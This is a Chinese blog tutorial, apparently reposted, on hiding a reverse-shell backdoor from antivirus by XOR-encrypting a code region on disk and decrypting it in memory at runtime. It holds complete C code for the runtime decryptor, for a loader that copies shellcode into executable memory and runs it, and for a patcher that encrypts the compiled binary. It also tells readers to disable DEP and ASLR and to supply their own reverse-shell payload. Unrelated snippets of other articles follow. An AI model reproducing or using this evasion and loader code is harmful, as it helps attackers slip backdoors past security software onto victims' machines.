1.9 动态解密ShellCode反弹

动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀,因为加密后的代码通常不会被标记为恶意代码。

利用动态解密执行技术可以实现免杀。当程序中使用了敏感的函数时,存在被杀的风险。通过将代码段中的代码进行加密,在需要时直接在内存中解密,可以避免被杀软检测到硬盘文件的特征,从而规避杀软针对硬盘特征的查杀手法。

在学习本章内容之前需要先了解VirtualProtect函数,该函数可以动态调整特定一段内存区域的读写执行属性,该函数原型如下所示;

BOOL WINAPI VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD  flNewProtect,PDWORD lpflOldProtect
);

其中,参数的含义如下:

  • lpAddress:欲更改保护属性的虚拟内存区域的起始地址。
  • dwSize:欲更改保护属性的虚拟内存区域的大小。
  • flNewProtect:新的保护属性。
  • lpflOldProtect:指向变量的指针,用于存储原始保护属性。

有了此关键函数的支持,那么实现动态解密执行将变得容易,一般而言在设置权限之前需要通过VirtualQuery来查询一下当前权限并将查询结果保存起来,该步骤主要用于在执行解密后来将内存恢复到原始位置,接着通过调用VirtualProtect函数,将该页的保护属性改为PAGE_READWRITE,以便可以对该页进行读写操作,解密函数很容易被实现。

void Decrypt(DWORD* pData, DWORD Size, DWORD value)
{// 保存查询结果MEMORY_BASIC_INFORMATION mbi_thunk;// 查询页信息VirtualQuery(pData, &mbi_thunk, sizeof(MEMORY_BASIC_INFORMATION));// 改变页保护属性为读写VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, PAGE_READWRITE, &mbi_thunk.Protect);// 计算出对数据共需要异或的次数Size = Size / 0x4;// 解密begindecrypt与enddecrypt标签处的数据while (Size--){*pData = (*pData) ^ value;pData++;}// 恢复页的原保护属性DWORD dwOldProtect;VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, mbi_thunk.Protect, &dwOldProtect);
}

如上所示该函数接受三个参数:pData 是待解密数据的指针,Size 是数据块的大小(以字节为单位),value 是用来异或解密数据的值。

首先,该函数调用了VirtualQuery函数来获取pData所在虚拟内存页的信息,然后通过调用VirtualProtect函数,将该页的保护属性改为PAGE_READWRITE,以便可以对该页进行读写操作。接下来该函数计算需要对多少个DWORD值进行异或解密。由于每个DWORD4个字节,所以将Size除以0x4就可以得到需要异或解密的DWORD数量。

最后,该函数对每个DWORD值进行异或解密操作,并将解密后的值写回到内存中。解密操作使用了按位异或(^)运算符,即将每个DWORD值中的每个字节与value中对应的字节进行异或操作。由于value是一个DWORD 值,因此在对所有字节进行异或操作时value4个字节会循环使用。最后再次调用VirtualProtect函数,将该页的保护属性改回原来的状态。

主函数中首先读者需要自行生成一段32位的反弹ShellCode后门,并将该区域替换至buf所处位置处,并编译这段代码;

小提示:读者在编译时,请关闭DEP,ASLR,地址随机化等保护,否则VA不固定,无法确定位置。

#pragma comment(linker, "/section:.data,RWE")typedef void(__stdcall *CODE) ();int main(int argc, char* argv[])
{DWORD AddressA, AddressB, Size, key;DWORD *ptr;TCHAR cCode[30] = { 0 };__asm mov AddressA, offset BeginOEP__asm mov AddressB, offset EndOEPSize = AddressB - AddressA;ptr = (DWORD*)AddressA;// 设置加密密钥_tcscpy(cCode, L"lyshark");key = 1;for (unsigned int i = 0; i< lstrlen(cCode); i++){key = key * 6 + cCode[i];}// 执行解密函数Decrypt(ptr, Size, key);BeginOEP:__asm inc eax  // 在十六进制工具中对应0x40__asm dec eax  // 在十六进制工具中对应0x48// MessageBoxA(0, "hello lyshark", 0, 0);unsigned char buf[] ="\xba\x1a\x77\xba\x2b\xd9\xee\xd9\x74\x24\xf4\x5e\x29\xc9""\xb1\x59\x31\x56\x14\x03\x56\x14\x83\xee\xfc\xf8\x82\x46""\xc3\x73\x6c\xb7\x14\xeb\xe4\x52\x25\x39\x92\x17\x14\x8d""\xd0\x7a\x95\x66\xb4\x6e\x94\x87\x36\x38\x9c\x51\xc2\x34""\x09\xac\x14\x14\x75\xaf\xe8\x67\xaa\x0f\xd0\xa7\xbf\x4e""\xdb\xac\xa6";PVOID pFunction = NULL;// 分配空间pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// 拷贝恶意代码memcpy(pFunction, buf, sizeof(buf));// 执行代码CODE StartShell = (CODE)pFunction;StartShell();EndOEP:__asm inc eax__asm dec eaxreturn 0;
}

此时我们需要将编译代码拖入到WinHex工具内,然后按下Ctrl+Alt+X输入4048找到开始于结束的位置,此处之所以是4048是因为我们在代码片段中布置了__asm inc eax,__asm dec eax是为了方便我们搜索时的特征值,至此我们分别记录下起始地址592结束地址5F4此处的代码需要被工具异或加密。

在这里插入图片描述

接下来读者需要实现一个对文件进行加密的功能,如下所示的PatchFile();函数,读者依次传入前面生成的后门程序,并分别传入WinHex中给出的起始地址及结束地址,以及一个加密密钥,此处需保持与上方解密密钥一致;

#include <Windows.h>
#include <tchar.h>
#include <iostream>// 异或加密
bool PatchFile(LPCTSTR szFileName, DWORD address1, DWORD address2, LPCTSTR szRegCode)
{TCHAR szBuffer[30] = { 0 };DWORD offset, Size, k, nbWritten, szTemp;;HANDLE hFile;DWORD* ptr;hFile = CreateFile(szFileName,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);if (hFile == INVALID_HANDLE_VALUE){return false;}// 对输入的注册码进行一定的变换,得到密钥k ,k = F(注册码)k = 1;for (DWORD i = 0; i < _tcslen(szRegCode); i++){k = k * 6 + szRegCode[i];}Size = address2 - address1;// 加密时,每次异或 DWORD数据,Size是为最终需要异或的次数Size = Size / 0x4;offset = address1;for (DWORD i = 0; i < Size; i++){SetFilePointer(hFile, offset, NULL, FILE_BEGIN);// 读取DWORD字节的文件内容ReadFile(hFile, szBuffer, 4, &szTemp, NULL);ptr = (DWORD*)szBuffer;*ptr = (*ptr) ^ k;SetFilePointer(hFile, offset, NULL, FILE_BEGIN);// 写入文件if (!WriteFile(hFile, ptr, 4, &nbWritten, NULL)){CloseHandle(hFile);return false;}offset = offset + 4;}CloseHandle(hFile);return true;
}int main(int argc, char* argv[])
{bool bSuccess = PatchFile("d://lyshark.exe", 0x592, 0x5f4, "lyshark");if (bSuccess){printf("ShellCode 已被加密替换");}system("pause");return 0;
}

这段代码运行后将会通过异或运算替换lyshark.exe程序中的0x592-0x5f4之间的机器码,并以lyshark为密钥依次异或替换;

当程序没有运行到指定区域时区域内的数据默认处于加密状态,此时的汇编指令集则处于被保护的状态;

在这里插入图片描述

而一旦EIP指针运行到此处时,则此处的代码将被解密并展开,由于指令执行到此处才会被解密执行,而未被执行则处于加密状态,所以这将导致多数磁盘查杀无法查出特征值,内存查杀也需要真正运行到此处才能确定此处代码的真正功能;

在这里插入图片描述

本文作者: 王瑞
本文链接: https://www.lyshark.com/post/a4b8c8b6.html
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/114533.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

WMS中Binder案例

WMS中Binder案例 1、FWK层中AIDL形式1.1 服务端实现Stub1.2 客户端获取proxy 2、紧密相关SurfaceFlinger android12-release 1、FWK层中AIDL形式 Android 接口定义语言 (AIDL)、Android 应用层 到 HAL 层 AIDL形式是Android中binder机制的具体实现。按照规范aidl/hidl文件自动生…

keras深度学习框架通过卷积神经网络cnn实现手写数字识别

昨天通过keras构建简单神经网络实现手写数字识别&#xff0c;结果在最后进行我们自己的手写数字识别的时候&#xff0c;准确率堪忧&#xff0c;只有60%。今天通过卷积神经网络来实现手写数字识别。 构建卷积神经网络和简单神经网络思路类似&#xff0c;只不过这里加入了卷积、池…

JavaWeb 速通Ajax

目录 一、Ajax快速入门 1.基本介绍 : 2.使用原理 : 二、Ajax经典入门案例 1.需求 : 2.前端页面实现 : 3. 处理HTTP请求的servlet实现 4.引入jar包及druid配置文件、工具类 : 5.Domain层实现 : 6.DAO层实现 : 7.Service层实现 : 8.运行测试 : 三、JQuery操作Ajax 1 …

Android studio实现圆形进度条

参考博客 效果图 MainActivity import androidx.appcompat.app.AppCompatActivity; import android.graphics.Color; import android.os.Bundle; import android.widget.TextView;import java.util.Timer; import java.util.TimerTask;public class MainActivity extends App…

OpenCV之filter2D函数

函数原型&#xff1a; CV_EXPORTS_W void filter2D(InputArray src,OutputArray dst,int ddepth,InputArray kernel,Point anchorPoint(-1,-1),double delta0,int borderTypeBORDER_DEFAULT); src: 原图像&#xff1b; dst&#xff1a;输出图像 &#xff0c;和输入的图像具有…

Android RecyclerView 之 吸顶效果

前言 上一篇文章已经实现了列表跟宫格布局的动态切换&#xff0c;这篇文章主要来说通过 CoordinatorLayout 和 AppbarLayout 的配合&#xff0c;以及 NestedScrollView 来实现吸顶效果 。效果如下。 一、CoordinatorLayout 是什么&#xff1f; CoordinatorLayout 是 Androi…

javaee之黑马乐优商城1

问题1&#xff1a;整体的项目架构与技术选型 技术选型 开发环境 域名测试 如何把项目起来&#xff0c;以及每一个目录结构大概是什么样子 通过webpack去启动了有个项目&#xff0c;这里还是热部署&#xff0c;文件改动&#xff0c;内容就会改动 Dev这个命令会生成一个本地循环…

Metasploit“MSF”连接postgresql时因排序规则版本不匹配导致无法连接

一、问题 更新Kali之后使用Metasploit时出现一个问题&#xff0c;连接postgresql时因排序规则版本不匹配导致无法连接 警告: database "msf" has a collation version mismatch DETAIL: The database was created using collation version 2.36, but the operati…

Web_单一视频文件mp4转换为m3u分段ts文件实现边下边播

一、下载ffmpeg: Builds - CODEX FFMPEG @ gyan.dev 二、转换视频文件: 先解压缩,会看到如下结构: 进入bin目录,把需要转换的视频文件复制过来,同时新建一个文件夹用来存放转换后的文件,然后按住Shift键同时单击鼠标右键,选择打开Powershell窗口: 输入以下命令(根据…

干货!耽误你1分钟,教你怎么查自己的流量卡是什么卡?

很多朋友都想购买一张正规的号卡&#xff0c;但是在网上一搜流量卡&#xff0c;五花八门&#xff0c;各式各样&#xff0c;那么&#xff0c;我们该如何辨别流量卡呢。 ​ 从种类上来看&#xff0c;网上的流量卡一共分为两种&#xff1a;号卡和物联卡 物联卡不用多说&#xff0…

无涯教程-Android - Linear Layout函数

Android LinearLayout是一个视图组&#xff0c;该视图组将垂直或水平的所有子级对齐。 Linear Layout - 属性 以下是LinearLayout特有的重要属性- Sr.NoAttribute & 描述1 android:id 这是唯一标识布局的ID。 2 android:baselineAligned 此值必须是布尔值&#xff0c;为…

【OpenCV入门】第三部分——绘制图形与文字

文章结构 线段的绘制矩形的绘制圆形的绘制多边形的绘制文字的绘制文字的斜体效果文字的垂直镜像效果在图像上绘制文字 动态绘制图形 线段的绘制 使用 line() 方法可绘制长短不一的、粗细各异的、五颜六色的线段。 img cv2.line(img,pt1,pt2,color,thickness)img&#xff1a;…

Spring MVC: 请求参数的获取

Spring MVC 前言通过 RequestParam 注解获取请求参数RequestParam用法 通过 ServletAPI 获取请求参数通过实体类对象获取请求参数附 前言 在 Spring MVC 介绍中&#xff0c;谈到前端控制器 DispatcherServlet 接收客户端请求&#xff0c;依据处理器映射 HandlerMapping 配置调…

DT 变形学习

弯曲变形 扩张变形 正弦变形 挤压变形 扭曲变形 波浪变形 内外的影响 雕刻 抖动变形 混合变形 晶格变形 包裹变形 线条变形 重置 在测试一个

嵌入式行业——选择比努力重要

嵌入式开发可以说是一个较大的类别&#xff0c;也可以看作是应用技术的一种广义称谓。它在不同的工业和行业场景中应用不同的业务模式和领域。 举个例子&#xff0c;嵌入式技术结合基站通信技术&#xff0c;就构成了华为基站&#xff1b;嵌入式技术结合视频处理/图像处理技术&a…

docker作业

目录 1、使用mysql:5.6和 owncloud 镜像&#xff0c;构建一个个人网盘。 1.1启动镜像 1.2启动cloud镜像 1.3浏览器访问 ​编辑 2、安装搭建私有仓库 Harbor 2.1下载docker-compose 2.2 磁盘挂载&#xff0c;保存harbor 2.3 修改配置文件 2.4安装 2.5浏览器访问 2.6 新…

因果推断(六)基于微软框架dowhy的因果推断

因果推断&#xff08;六&#xff09;基于微软框架dowhy的因果推断 DoWhy 基于因果推断的两大框架构建&#xff1a;「图模型」与「潜在结果模型」。具体来说&#xff0c;其使用基于图的准则与 do-积分来对假设进行建模并识别出非参数化的因果效应&#xff1b;而在估计阶段则主要…

2023年信息安全管理与评估任务书模块一网络平台搭建与设备安全防护

全国职业院校技能大赛 高等职业教育组 信息安全管理与评估 任务书 模块一 网络平台搭建与设备安全防护 比赛时间 本阶段比赛时长为180分钟。 赛项信息 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段 网络平台搭建与设备安全防护 任务1 网络平台搭建 9:00- 12:00 …

Linux文件管理知识:查找文件(第二篇)

上篇文章详细介绍了linux系统中查找文件的工具或者命令程序locate和find命令的基本操作。那么&#xff0c;今天这篇文章紧接着查找文件相关操作内容介绍。 Find命令所属操作列表中的条目&#xff0c;有助于我们想要的结果输出。上篇文章已讲到find 命令是基于搜索结果来执行操作…

什么是BEM命名规范(Block-Element-Modifier Notation)?它有什么优势?

聚沙成塔每天进步一点点 ⭐ 专栏简介⭐ BEM命名规范&#xff08;Block-Element-Modifier Notation&#xff09;⭐ BEM命名结构⭐ 优势⭐ 写在最后 ⭐ 专栏简介 前端入门之旅&#xff1a;探索Web开发的奇妙世界 记得点击上方或者右侧链接订阅本专栏哦 几何带你启航前端之旅 欢迎…